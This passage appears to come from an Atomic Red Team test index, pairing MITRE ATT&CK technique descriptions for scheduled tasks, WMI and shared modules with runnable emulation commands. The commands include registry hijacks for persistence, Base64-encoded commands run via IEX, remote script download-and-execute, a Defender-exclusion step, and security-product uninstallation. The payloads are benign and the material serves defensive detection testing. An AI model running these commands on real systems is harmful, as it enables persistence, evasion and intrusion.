SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate
methods to hide tasks, such as altering the metadata (e.g., `Index` value)
within associated registry keys.(Citation: Defending Against Scheduled Task
Attacks in Windows Environments) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.3.0
x_mitre_contributors:
- Andrew Northern, @ex_raritas
- Bryan Campbell, @bry_campbell
- Selena Larson, @selenalarson
- Sittikorn Sangrattanapitak
- Zachary Abzug, @ZackDoesML
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.8'
x_mitre_remote_support: false
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2
description: |
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
the tasks, open the Task Scheduler and look in the Active Tasks pane.
supported_platforms:
- windows
executor:
command: |
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
cleanup_command: |
schtasks /delete /tn "T1053_005_OnLogon" /f >nul 2>&1
schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Scheduled task Local
auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
'
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
executor:
name: command_prompt
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
'
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
Create a task on a remote system.
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint.
supported_platforms:
- windows
input_arguments:
task_command:
description: What you want to execute
type: string
default: C:\windows\system32\cmd.exe
time:
description: What time 24 Hour
type: string
default: '20:10'
target:
description: Target
type: string
default: localhost
user_name:
description: 'Username to authenticate with, format: DOMAIN\User'
type: string
default: DOMAIN\user
password:
description: Password to authenticate with
type: string
default: At0micStrong
executor:
name: command_prompt
elevation_required: true
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
'
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
30 - 40 seconds after this module has run
supported_platforms:
- windows
input_arguments:
ms_product:
description: Maldoc application Word
type: string
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
-UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
-officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
name: powershell
cleanup_command: 'Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false
'
- name: WMI Invoke-CimMethod Scheduled Task
auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b
description: 'Create an scheduled task that executes notepad.exe after user
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
'
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
127.0.0.1) and then a scheduled task will be created.\nThe scheduled task
will launch powershell to decode and run the command in the registry daily.\nThis
is a persistence mechanism recently seen in use by Qakbot. \n\n[Additiona
Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/)\n"
supported_platforms:
- windows
input_arguments:
time:
description: Daily scheduled task execution time
type: string
default: '07:45'
executor:
command: |
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
cleanup_command: |
schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
name: command_prompt
- name: Import XML Schedule Task with Hidden Attribute
auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
description: "Create an scheduled task that executes calc.exe after user login
from XML that contains hidden setting attribute. \nThis technique was seen
several times in tricbot malware and also with the targetted attack campaigne
the industroyer2.\n"
supported_platforms:
- windows
input_arguments:
xml_path:
description: path of vbs to use when creating masquerading files
type: path
default: PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml
dependency_executor_name: powershell
dependencies:
- description: 'File to copy must exist on disk at specified location (#{xml_path})
'
prereq_command: 'if (Test-Path "#{xml_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{xml_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml" -OutFile "#{xml_path}"
executor:
name: powershell
elevation_required: true
command: |
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
>$null 2>&1
'
- name: PowerShell Modify A Scheduled Task
auto_generated_guid: dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
description: "Create a scheduled task with an action and modify the action to
do something else. The initial idea is to showcase Microsoft Windows TaskScheduler
Operational log modification of an action on a Task already registered. \nIt
will first be created to spawn cmd.exe, but modified to run notepad.exe.\n\nUpon
successful execution, powershell.exe will create a scheduled task and modify
the action. \n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTaskModifed" -confirm:$false
>$null 2>&1
'
- name: Scheduled Task ("Ghost Task") via Registry Key Manipulation
auto_generated_guid: 704333ca-cc12-4bcf-9916-101844881f54
description: |
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.
This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.
For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-added task
type: string
default: lilghostie
task_command:
description: Command you want the task to execute
type: string
default: notepad.exe
target:
description: System where the task should run
type: string
default: localhost
user_name:
description: Username to authenticate with, such as ATOMICDOMAIN\AtomicAdmin
type: string
default: "$env:USERDOMAIN + '\\' + $env:USERNAME"
dependency_executor_name: powershell
dependencies:
- description: 'PsExec tool from Sysinternals must exist in the ExternalPayloads
directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
- description: 'GhostTask.exe tool from netero101 must exist in the ExternalPayloads
directory. This tool may be quarantined by windows defender; disable windows
defender real-time protection to fix it or add the ExternalPayloads directory
as an exclusion, using a command like `Add-MpPreference -ExclusionPath "PathToAtomicsFolder\..\ExternalPayloads\"`
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe")
{ exit 0} else { exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe"
executor:
name: command_prompt
elevation_required: true
command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
cleanup_command: |
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} delete #{task_name} > nul
- name: Scheduled Task Persistence via CompMgmt.msc
auto_generated_guid: 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2
description: "Adds persistence by abusing `compmgmt.msc` via a scheduled task.\nWhen
the Computer Management console is opened, it will run a malicious payload
(in this case, `calc.exe`). \nThis technique abuses scheduled tasks and registry
modifications to hijack legitimate system processes.\n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: CompMgmtBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
- name: Scheduled Task Persistence via Eventviewer.msc
auto_generated_guid: 02124c37-767e-4b76-9383-c9fc366d9d4c
description: "Adds persistence by abusing `eventviewer.msc` via a scheduled
task.\nWhen the eventviewer console is opened, it will run a malicious payload
(in this case, `calc.exe`). \n"
supported_platforms:
- windows
input_arguments:
task_name:
description: Name of the newly-created scheduled task
type: string
default: EventViewerBypass
payload:
description: Command you want the task to execute
type: string
default: calc.exe
executor:
name: command_prompt
elevation_required: true
command: |
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /f
schtasks /Delete /TN "#{task_name}" /F
T1047:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
created: '2017-05-31T21:30:44.329Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1047
external_id: T1047
- source_name: FireEye WMI 2015
description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
(WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
- source_name: Mandiant WMI
description: Mandiant. (n.d.). Retrieved February 13, 2024.
url: https://www.mandiant.com/resources/reports
- source_name: WMI 6
description: Microsoft. (2022, June 13). BlackCat. Retrieved February 13,
2024.
url: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
- source_name: WMI 1-3
description: Microsoft. (2023, March 7). Retrieved February 13, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page?redirectedfrom=MSDN
- source_name: WMI 7,8
description: Microsoft. (2024, January 26). WMIC Deprecation. Retrieved February
13, 2024.
url: https://techcommunity.microsoft.com/t5/windows-it-pro-blog/wmi-command-line-wmic-utility-deprecation-next-steps/ba-p/4039242
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:19.670Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- "@ionstorm"
- Olaf Hartong, Falcon Force
- Tristan Madani
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.6'
x_mitre_remote_support: false
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea
description: "An adversary might use WMI to list all local User Accounts. \nWhen
the test completes , there should be local user accounts information displayed
on the command line.\n"
supported_platforms:
- windows
executor:
command: 'wmic useraccount get /ALL /format:csv
'
name: command_prompt
- name: WMI Reconnaissance Processes
auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
description: |
An adversary might use WMI to list Processes running on the compromised host.
When the test completes , there should be running processes listed on the command line.
supported_platforms:
- windows
executor:
command: 'wmic process get caption,executablepath,commandline /format:csv
'
name: command_prompt
- name: WMI Reconnaissance Software
auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
description: |
An adversary might use WMI to list installed Software hotfix and patches.
When the test completes, there should be a list of installed patches and when they were installed.
supported_platforms:
- windows
executor:
command: 'wmic qfe get description,installedOn /format:csv
'
name: command_prompt
- name: WMI Reconnaissance List Remote Services
auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
description: "An adversary might use WMI to check if a certain Remote Service
is running on a remote device. \nWhen the test completes, a service information
will be displayed on the screen if it exists.\nA common feedback message is
that \"No instance(s) Available\" if the service queried is not running.\nA
common error message is \"Node - (provided IP or default) ERROR Description
=The RPC server is unavailable\" \nif the provided remote host is unreachable\n"
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
service_search_string:
description: Name Of Service
type: string
default: Spooler
executor:
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
'
name: command_prompt
- name: WMI Execute Local Process
auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
description: |
This test uses wmic.exe to execute a process on the local host.
When the test completes , a new process will be started locally .A notepad application will be started when input is left on default.
supported_platforms:
- windows
input_arguments:
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
command: 'wmic process call create #{process_to_execute}
'
cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete
>nul 2>&1
'
name: command_prompt
- name: WMI Execute Remote Process
auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
description: |
This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter.
To clean up, provide the same node input as the one provided to run the test
A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
user_name:
description: Username
type: string
default: DOMAIN\Administrator
password:
description: Password
type: string
default: P@ssw0rd1
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process
call create #{process_to_execute}
'
cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}"
process where name=''#{process_to_execute}'' delete >nul 2>&1
'
name: command_prompt
- name: Create a Process using WMI Query and an Encoded Command
auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
description: |
Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand
Powershell -nop -exec bypass -EncodedCommand
Where the –EncodedCommand, once decoded, would resemble:
Invoke-WMIMethod win32_process -name create -argumentlist ‘rundll32 c:\windows\idmu\common\ypprop.dll _XInitImageFuncPtrs’ -ComputerName WORKSTATION
The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe
You should expect to see notepad.exe running after execution of this test.
[Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
supported_platforms:
- windows
executor:
command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
'
name: command_prompt
- name: Create a Process using obfuscated Win32_Process
auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
description: |
This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic.
[Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32)
supported_platforms:
- windows
input_arguments:
new_class:
description: Derived class name
type: string
default: Win32_Atomic
process_to_execute:
description: Name or path of process to execute.
type: string
default: notepad.exe
executor:
name: powershell
elevation_required: true
command: |
$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath("Win32_Process"))
$NewClass = $Class.Derive("#{new_class}")
$NewClass.Put()
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
cleanup_command: |
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
try { $CleanupClass.Delete() } catch {}
- name: WMI Execute rundll32
auto_generated_guid: '00738d2a-4651-4d76-adf2-c43a41dfb243'
description: 'This test uses wmic.exe to execute a DLL function using rundll32.
Specify a valid value for remote IP using the node parameter.
'
supported_platforms:
- windows
input_arguments:
node:
description: Ip Address
type: string
default: 127.0.0.1
dll_to_execute:
description: Path to DLL.
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\calc.dll
function_to_execute:
description: Name of DLL function to call
type: string
default: StartW
dependency_executor_name: powershell
dependencies:
- description: DLL with function to execute must exist on disk at specified
location (#{dll_to_execute})
prereq_command: 'if (Test-Path "#{dll_to_execute}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}"
executor:
command: 'wmic /node:#{node} process call create "rundll32.exe \"#{dll_to_execute}\"
#{function_to_execute}"
'
cleanup_command: taskkill /f /im calculator.exe
name: command_prompt
- name: Application uninstall using WMIC
auto_generated_guid: c510d25b-1667-467d-8331-a56d3e9bc4ff
description: Emulates uninstalling applications using WMIC. This method only
works if the product was installed with an msi file. APTs have been seen
using this to uninstall security products.
supported_platforms:
- windows
input_arguments:
node:
description: Computer the action is being executed against but defaults
to the localhost.
type: string
default: 127.0.0.1
product:
description: Enter the product name being uninstalled. This will default
to TightVNC.
type: string
default: Tightvnc
dependency_executor_name: powershell
dependencies:
- description: TightVNC must be installed.
prereq_command: if ((Test-Path "C:\Program Files\TightVNC\tvnviewer.exe")-Or
(Test-Path "C:\Program Files (x86)\TightVNC\tvnviewer.exe")) {exit 0} else
{exit 1}
get_prereq_command: |-
Invoke-WebRequest 'https://www.tightvnc.com/download/2.8.63/tightvnc-2.8.63-gpl-setup-64bit.msi' -OutFile "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
start-sleep -s 10
msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi" /qn /norestart
start-sleep -s 15
executor:
command: wmic /node:"#{node}" product where "name like '#{product}%%'" call
uninstall
cleanup_command: msiexec /i "PathToAtomicsFolder\..\ExternalPayloads\tightvncinstaller.msi"
/qn /norestart
name: command_prompt
elevation_required: true
T1129:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65
created: '2017-05-31T21:31:40.542Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1129
external_id: T1129
- source_name: RotaJakiro 2021 netlab360 analysis
description: " Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long
live secret backdoor with 0 VT detection. Retrieved June 14, 2023."
url: https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/
- source_name: Apple Dev Dynamic Libraries
description: Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved
September 7, 2023.
url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
- source_name: Unit42 OceanLotus 2017
description: Erye Hernandez and Danny Tsechansky. (2017, June 22). The New
and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.
url: https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/
- source_name: Microsoft DLL
description: Microsoft. (2023, April 28). What is a DLL. Retrieved September
7, 2023.
url: https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library
- source_name: Linux Shared Libraries
description: Wheeler, D. (2003, April 11). Shared Libraries. Retrieved September
7, 2023.
url: https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:22.302Z'
name: Server Software Component
description: |-
Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.
The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_version: '2.3'
x_mitre_remote_support: false
identifier: T1129
atomic_tests:
- name: ESXi - Install a custom VIB on an ESXi host
auto_generated_guid: 7f843046-abf2-443f-b880-07a83cf968ec
description: |
An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs).
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name of the ESXi Server
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on ESXi Server
type: string
default: root
vm_pass:
description: Specify the privilege user password on ESXi Server
type: string
default: pass
plink_file:
description: Path to plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
pscp_file:
description: Path to Pscp
type: path
